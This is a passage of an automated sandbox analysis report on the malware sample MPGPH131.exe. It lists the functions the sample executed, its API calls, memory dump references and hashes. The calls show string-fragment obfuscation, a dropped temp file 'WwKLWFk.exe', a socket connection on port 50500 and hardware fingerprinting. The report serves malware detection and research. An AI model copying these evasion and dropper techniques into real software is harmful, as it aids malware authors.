Associated: 0000000E.00000002.3729391873.00000000006F1000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729391873.00000000006FF000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3731286303.0000000000700000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3733691113.00000000008AD000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3733794921.00000000008AE000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3733896497.00000000008B1000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3733992811.00000000008B2000.00000080.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_300000_MPGPH131.jbxd

Yara matches

Similarity

API ID: Concurrency::cancel_current_task
String ID: type must be boolean, but is $type must be string, but is
API String ID: 118556049-436076039
Opcode ID: 836650821aed3ca52020c6cd5df08ba0b7bba2b40df1a9e749ffb503f9e66020
Instruction ID: ad3d3870c9bb876b4eb809998021c8d64e9696f1217ca5a486359f132af683f3
Opcode Fuzzy Hash: 836650821aed3ca52020c6cd5df08ba0b7bba2b40df1a9e749ffb503f9e66020
Instruction Fuzzy Hash: 12316EB1D002489FCB16EBA4D842F9E77A9DB14710F10836AF419DB7D6EB38AD04C755

Analysis Process: MPGPH131.exePID: 8124, Parent PID: 1040COMMON

Execution Graph

Execution Coverage:	1.7%
Dynamic/Decrypted Code Coverage:	2%
Signature Coverage:	0%
Total number of Nodes:	247
Total number of Limit Nodes:	40

Executed Functions

Function 008B1044 Relevance: 29.9, APIs: 2, Strings: 15, Instructions: 171
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTempPathA.KERNELBASE(00000104,?), ref: 008B11FA
CreateFileA.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 008B1223

Strings

dleA, xrefs: 008B10D0
WwKLWFk.exe, xrefs: 008B11FD, 008B1200
Clos, xrefs: 008B1129
GetM, xrefs: 008B10B6
GetT, xrefs: 008B1188
WinE, xrefs: 008B1110
Crea, xrefs: 008B1169
.dll, xrefs: 008B1102
el32, xrefs: 008B10FB
catA, xrefs: 008B11AF
Writ, xrefs: 008B1148
athA, xrefs: 008B1199
odul, xrefs: 008B122D
Kern, xrefs: 008B10F4
lstr, xrefs: 008B11A7

Memory Dump Source

Source File: 0000000F.00000002.3733797853.00000000008B1000.00000040.00000001.01000000.00000009.sdmp, Offset: 00300000, based on PE: true

Associated: 0000000F.00000002.3728527720.0000000000300000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3728599637.0000000000301000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3728599637.0000000000433000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729095758.0000000000437000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729271658.000000000044A000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729271658.00000000005CD000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729271658.00000000006AB000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729271658.00000000006E8000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729271658.00000000006F1000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729271658.00000000006FF000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3731154478.0000000000700000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3733577613.00000000008AD000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3733691530.00000000008AE000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3733912458.00000000008B2000.00000080.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_300000_MPGPH131.jbxd

Yara matches

Similarity

API ID: CreateFilePathTemp
String ID: .dll$Clos$Crea$GetM$GetT$Kern$WinE$Writ$WwKLWFk.exe$athA$catA$dleA$el32$lstr$odul
API String ID: 1031868398-1035807574
Opcode ID: 427073a4ef8cdd273e52de3960116424fab24a684a798692c956fdf8c3eeff39
Instruction ID: c96851f0987c8afbc2e98fb2e1eb046562e801de2c9ffb537dba27b6c6383483
Opcode Fuzzy Hash: 427073a4ef8cdd273e52de3960116424fab24a684a798692c956fdf8c3eeff39
Instruction Fuzzy Hash: 25612975D01219DBCF24CF98C8A8AEEF7B4FB44315FA4926AD605AB301C3309A81CB95

Function 0031DB60 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 99
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSAStartup.WS2_32 ref: 0031DB8B
socket.WS2_32(?,?,?,?,?,?,50500,?,?), ref: 0031DC2D
connect.WS2_32(00000000,?,?,?,?,?,50500,?,?), ref: 0031DC42
closesocket.WS2_32(00000000), ref: 0031DC4D

Strings

50500, xrefs: 0031DBE8

Memory Dump Source

Source File: 0000000F.00000002.3728599637.0000000000301000.00000040.00000001.01000000.00000009.sdmp, Offset: 00300000, based on PE: true

Associated: 0000000F.00000002.3728527720.0000000000300000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3728599637.0000000000433000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729095758.0000000000437000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729271658.000000000044A000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729271658.00000000005CD000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729271658.00000000006AB000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729271658.00000000006E8000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729271658.00000000006F1000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729271658.00000000006FF000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3731154478.0000000000700000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3733577613.00000000008AD000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3733691530.00000000008AE000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3733797853.00000000008B1000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3733912458.00000000008B2000.00000080.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_300000_MPGPH131.jbxd

Yara matches

Similarity

API ID: Startupclosesocketconnectsocket
String ID: 50500
API String ID: 3098855095-2230786414
Opcode ID: 3f3aec8bfdeed507a4a5827318761ae281ce7c5ebfe7fcf0d35fcb71051dc98a
Instruction ID: b41ad51c8287d9d88a5de3419a79bd1aa1239a4dc479b51a9dbb01d3fae57517
Opcode Fuzzy Hash: 3f3aec8bfdeed507a4a5827318761ae281ce7c5ebfe7fcf0d35fcb71051dc98a
Instruction Fuzzy Hash: 6231E472505314ABC7219B28CC89B6BB7E5FFCA334F015F1DF9A4A32D0E370A8448692

Function 04E1085D Relevance: 1.8, APIs: 1, Instructions: 277
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentHwProfileW.ADVAPI32(?), ref: 04E1091F

Memory Dump Source

Source File: 0000000F.00000002.3744493837.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_4e10000_MPGPH131.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: be312ef6e9ecdad1e8c62c7237d30ec2c325f9b24362cd098aaf5f159731128b
Instruction ID: 03e920ca8be93ced48ade69f7007aba29c0fab701ae31cc7016b0e8262258075
Opcode Fuzzy Hash: be312ef6e9ecdad1e8c62c7237d30ec2c325f9b24362cd098aaf5f159731128b
Instruction Fuzzy Hash: 3D5107FB78C114FDE10285811B54EF66B6EE7C723073060A6F543D6E22F2902AC57661

Function 04E10806 Relevance: 1.7, APIs: 1, Instructions: 207
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentHwProfileW.ADVAPI32(?), ref: 04E1091F

Memory Dump Source

Source File: 0000000F.00000002.3744493837.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_4e10000_MPGPH131.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: 4ce369961cce08919573acaa17aae64af8211114b588e834027fbb50c5f3cde4
Instruction ID: e520dbed18eccb97eda5ea52e2d1f9b8c66ac5a311adb286b9f4bbdf3affab6f
Opcode Fuzzy Hash: 4ce369961cce08919573acaa17aae64af8211114b588e834027fbb50c5f3cde4
Instruction Fuzzy Hash: 7E4126F77CC114BEE60286401B60AF66B6EEBC7230730A066F547D6D22F6912AC96271

Function 003F2B5C Relevance: 1.7, APIs: 1, Instructions: 198
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteFile.KERNELBASE(?,00000000,003E6747,?,00000000,00000000,00000000,?,00000000,?,003DBC71,003E6747,00000000,003DBC71,?,?), ref: 003F2CE1

Memory Dump Source

Source File: 0000000F.00000002.3728599637.0000000000301000.00000040.00000001.01000000.00000009.sdmp, Offset: 00300000, based on PE: true

Associated: 0000000F.00000002.3728527720.0000000000300000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3728599637.0000000000433000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729095758.0000000000437000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729271658.000000000044A000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729271658.00000000005CD000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729271658.00000000006AB000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729271658.00000000006E8000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729271658.00000000006F1000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729271658.00000000006FF000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3731154478.0000000000700000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3733577613.00000000008AD000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3733691530.00000000008AE000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3733797853.00000000008B1000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3733912458.00000000008B2000.00000080.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_300000_MPGPH131.jbxd

Yara matches

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 00e91b5e8b8f79ae8937d31d7343c25fd4c9e4d4ac0c76bb869cd43812350e09
Instruction ID: df12038ed2186b4a77648efe2bbd5c760b05d016f4c0e456e534446d177e4302
Opcode Fuzzy Hash: 00e91b5e8b8f79ae8937d31d7343c25fd4c9e4d4ac0c76bb869cd43812350e09
Instruction Fuzzy Hash: 3361BCB190011DEFDF12DFA8C884EFFBBB9AF09304F150185EA10AB256D776D9019BA0

Function 04E10879 Relevance: 1.7, APIs: 1, Instructions: 184
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentHwProfileW.ADVAPI32(?), ref: 04E1091F

Memory Dump Source

Source File: 0000000F.00000002.3744493837.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_4e10000_MPGPH131.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: f1435aa5f1c2cc511e949ca28a5f03015db7cbcc2c1ba27050eadd4429c494c6
Instruction ID: e04417c5352e25eb94c69aaf630cd346d9d5f264bcf392995f3472fa22b83dee
Opcode Fuzzy Hash: f1435aa5f1c2cc511e949ca28a5f03015db7cbcc2c1ba27050eadd4429c494c6
Instruction Fuzzy Hash: 0941F5F778C114BDF50286511B609FA6A6EEBC7330730A066F54795A22F2D02AC97171

Function 04E108AD Relevance: 1.7, APIs: 1, Instructions: 173
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentHwProfileW.ADVAPI32(?), ref: 04E1091F

Memory Dump Source

Source File: 0000000F.00000002.3744493837.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_4e10000_MPGPH131.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: f70349623df4180127b630e0e5bc890499fc90c1b10795ddf74500edc1b9f9f8
Instruction ID: 913f8996d4a113173a3d5c6878ee2dae31cc68ce26095f205b874b7b0915c1b1
Opcode Fuzzy Hash: f70349623df4180127b630e0e5bc890499fc90c1b10795ddf74500edc1b9f9f8
Instruction Fuzzy Hash: 9031EEFB38C114BDF54686411B60EFA6A6EEBC7230730A062F547D5A22F6902AC97131

Function 04E108BF Relevance: 1.7, APIs: 1, Instructions: 170
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentHwProfileW.ADVAPI32(?), ref: 04E1091F

Memory Dump Source

Source File: 0000000F.00000002.3744493837.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_4e10000_MPGPH131.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: 24d3e21659390c24b80bad4ec65bcc462599519863b943775e64a9c34709d601
Instruction ID: 3eda8de59097b3c85fb8f10c54b35e8d5e59773e29df9ed72c735116c93400c7
Opcode Fuzzy Hash: 24d3e21659390c24b80bad4ec65bcc462599519863b943775e64a9c34709d601
Instruction Fuzzy Hash: 0C31CDFB78C114BDF14686411B20EFA6A6EEBC7630730A063F547D6A22F6912AC96131

Function 04E108C9 Relevance: 1.7, APIs: 1, Instructions: 168
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentHwProfileW.ADVAPI32(?), ref: 04E1091F

Memory Dump Source

Source File: 0000000F.00000002.3744493837.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_4e10000_MPGPH131.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: 9dcc926fbc75c5f10701123b4e03e07d87070714b63d6842b5349978405bb4f3
Instruction ID: b2f438657dc8bdd068b23b0b0d544245a4d351cfcb254bd9304af3133ea00fd8
Opcode Fuzzy Hash: 9dcc926fbc75c5f10701123b4e03e07d87070714b63d6842b5349978405bb4f3
Instruction Fuzzy Hash: E131E0FB38C114BDF14686511B20EFA6A6EEBC7730730A062F547D5A22F7912AC96531

Function 04E108D9 Relevance: 1.7, APIs: 1, Instructions: 168
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentHwProfileW.ADVAPI32(?), ref: 04E1091F

Memory Dump Source

Source File: 0000000F.00000002.3744493837.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_4e10000_MPGPH131.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: 0820eea91b49623a8fefde26f4143212cbce0eebb1abbfff18892382cb1d9eda
Instruction ID: 4250ff3811abafcef8ee93375ce090ea98b0ca079c9f53d3698ce80c276309c1
Opcode Fuzzy Hash: 0820eea91b49623a8fefde26f4143212cbce0eebb1abbfff18892382cb1d9eda
Instruction Fuzzy Hash: DA31E2FB78C214FDF10685411A60EFA6A6EEBC7330730A066F547D6A12F7902AC96531

Function 04E108F4 Relevance: 1.7, APIs: 1, Instructions: 165
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentHwProfileW.ADVAPI32(?), ref: 04E1091F

Memory Dump Source

Source File: 0000000F.00000002.3744493837.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_4e10000_MPGPH131.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: 790b834ba0a95e6686fc55af5fd4693aeb63a8b52958b381d99ac3f83c251d4d
Instruction ID: 0c639f082b2d26a8df6fb844c03cc2a6a80521fc6e472b447de4fda45ec962eb
Opcode Fuzzy Hash: 790b834ba0a95e6686fc55af5fd4693aeb63a8b52958b381d99ac3f83c251d4d
Instruction Fuzzy Hash: AD3135FB78C214BEE20685501B24EFA6B6EEBC7730730A067F503D6A12F2811AC96171

Function 0036B6B0 Relevance: 1.6, APIs: 1, Instructions: 135
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 0036B801

Memory Dump Source

Source File: 0000000F.00000002.3728599637.0000000000301000.00000040.00000001.01000000.00000009.sdmp, Offset: 00300000, based on PE: true

Associated: 0000000F.00000002.3728527720.0000000000300000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3728599637.0000000000433000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729095758.0000000000437000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729271658.000000000044A000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729271658.00000000005CD000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729271658.00000000006AB000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729271658.00000000006E8000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729271658.00000000006F1000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729271658.00000000006FF000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3731154478.0000000000700000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3733577613.00000000008AD000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3733691530.00000000008AE000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3733797853.00000000008B1000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3733912458.00000000008B2000.00000080.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_300000_MPGPH131.jbxd

Yara matches

Similarity

API ID: Concurrency::cancel_current_task
String ID:
API String ID: 118556049-0
Opcode ID: 617db6ab8b8d5904d46ca521fca4f6ec3a4692538c761b60814e4c8ab9871f96
Instruction ID: ea656757d3a7544289a05b87099e9647513226a71083034232933395523a3f36
Opcode Fuzzy Hash: 617db6ab8b8d5904d46ca521fca4f6ec3a4692538c761b60814e4c8ab9871f96
Instruction Fuzzy Hash: CE4138739001159BCB17EF68DC8066EBBA9EF84350F15426AF805EB346D730EE518BE1

Function 003F21D2 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindCloseChangeNotification.KERNELBASE(00000000,00000000,CF830579,?,003F20B9,00000000,CF830579,00431090,0000000C,003F2175,003E627D,?), ref: 003F2228

Memory Dump Source

Source File: 0000000F.00000002.3728599637.0000000000301000.00000040.00000001.01000000.00000009.sdmp, Offset: 00300000, based on PE: true

Associated: 0000000F.00000002.3728527720.0000000000300000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3728599637.0000000000433000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729095758.0000000000437000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729271658.000000000044A000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729271658.00000000005CD000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729271658.00000000006AB000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729271658.00000000006E8000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729271658.00000000006F1000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729271658.00000000006FF000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3731154478.0000000000700000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3733577613.00000000008AD000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3733691530.00000000008AE000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3733797853.00000000008B1000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3733912458.00000000008B2000.00000080.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_300000_MPGPH131.jbxd

Yara matches

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 0372f5acffbf1c4ec0b594400ca7c2017a6e67177f77953665f9bc8dfa46d564
Instruction ID: a8df544d65c8058968df076aca185e93aca8732fcdb3d408cb923e5e483d6687
Opcode Fuzzy Hash: 0372f5acffbf1c4ec0b594400ca7c2017a6e67177f77953665f9bc8dfa46d564
Instruction Fuzzy Hash: AB11893360822CA6D6233274AC82B7F2B898F82734F770629FB189F1D2DE71AC415194

Function 003EB71C Relevance: 1.6, APIs: 1, Instructions: 54
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetFilePointerEx.KERNELBASE(00000000,00000000,00430D48,003DBC71,00000002,003DBC71,00000000,?,?,?,003EB826,00000000,?,003DBC71,00000002,00430D48), ref: 003EB758

Memory Dump Source

Source File: 0000000F.00000002.3728599637.0000000000301000.00000040.00000001.01000000.00000009.sdmp, Offset: 00300000, based on PE: true

Associated: 0000000F.00000002.3728527720.0000000000300000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3728599637.0000000000433000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729095758.0000000000437000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729271658.000000000044A000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729271658.00000000005CD000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729271658.00000000006AB000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729271658.00000000006E8000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729271658.00000000006F1000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729271658.00000000006FF000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3731154478.0000000000700000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3733577613.00000000008AD000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3733691530.00000000008AE000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3733797853.00000000008B1000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3733912458.00000000008B2000.00000080.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_300000_MPGPH131.jbxd

Yara matches

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: c7ba99c37027e2d325543fcf4abc97dba2696ff1df7ec975d0e82be47d36ed79
Instruction ID: 193fcc36e931ff244fd4962b32edf18691d374f01615eeec3e6ad3c6bd972491
Opcode Fuzzy Hash: c7ba99c37027e2d325543fcf4abc97dba2696ff1df7ec975d0e82be47d36ed79
Instruction Fuzzy Hash: E701C8366105A5ABCF079F55DC41C9E7B59DF81320B250208F8519B2D1EB71ED419B90

Function 003DC950 Relevance: 1.6, APIs: 1, Instructions: 50
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00301FDE

Memory Dump Source

Source File: 0000000F.00000002.3728599637.0000000000301000.00000040.00000001.01000000.00000009.sdmp, Offset: 00300000, based on PE: true

Associated: 0000000F.00000002.3728527720.0000000000300000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3728599637.0000000000433000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729095758.0000000000437000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729271658.000000000044A000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729271658.00000000005CD000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729271658.00000000006AB000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729271658.00000000006E8000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729271658.00000000006F1000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729271658.00000000006FF000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3731154478.0000000000700000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3733577613.00000000008AD000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3733691530.00000000008AE000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3733797853.00000000008B1000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3733912458.00000000008B2000.00000080.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_300000_MPGPH131.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy
String ID:
API String ID: 2659868963-0
Opcode ID: e4d0ae6aafb240b0b1d62e74c63eba1a2e240b5fb27b185dc81b8cce21acf58c
Instruction ID: 888deaddd1599a7eec76a846bd8bd0f658a924b08e7ef8ad274dbde810d19fc8
Opcode Fuzzy Hash: e4d0ae6aafb240b0b1d62e74c63eba1a2e240b5fb27b185dc81b8cce21acf58c
Instruction Fuzzy Hash: 07014E3641030EA7CB17ABA4FC1154A779C9E02360B508333F508AE6D1FB70E954C7D4

Function 003F3AB3 Relevance: 1.5, APIs: 1, Instructions: 40memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,003DADBC,?,?,003F3439,00000001,00000364,?,00000006,000000FF,?,003DDD3B,?,?,?,?), ref: 003F3AF5

Memory Dump Source

Source File: 0000000F.00000002.3728599637.0000000000301000.00000040.00000001.01000000.00000009.sdmp, Offset: 00300000, based on PE: true

Associated: 0000000F.00000002.3728527720.0000000000300000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3728599637.0000000000433000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729095758.0000000000437000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729271658.000000000044A000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729271658.00000000005CD000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729271658.00000000006AB000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729271658.00000000006E8000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729271658.00000000006F1000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729271658.00000000006FF000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3731154478.0000000000700000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3733577613.00000000008AD000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3733691530.00000000008AE000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3733797853.00000000008B1000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3733912458.00000000008B2000.00000080.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_300000_MPGPH131.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 06b63668285a2000df8359811aa3c1cd4c55ba09ae368722fa7c125cef877716
Instruction ID: c53c88bc559d5062c206cb5b8acf0d84a2112ef973188806a2ef3f27db15d5ad
Opcode Fuzzy Hash: 06b63668285a2000df8359811aa3c1cd4c55ba09ae368722fa7c125cef877716
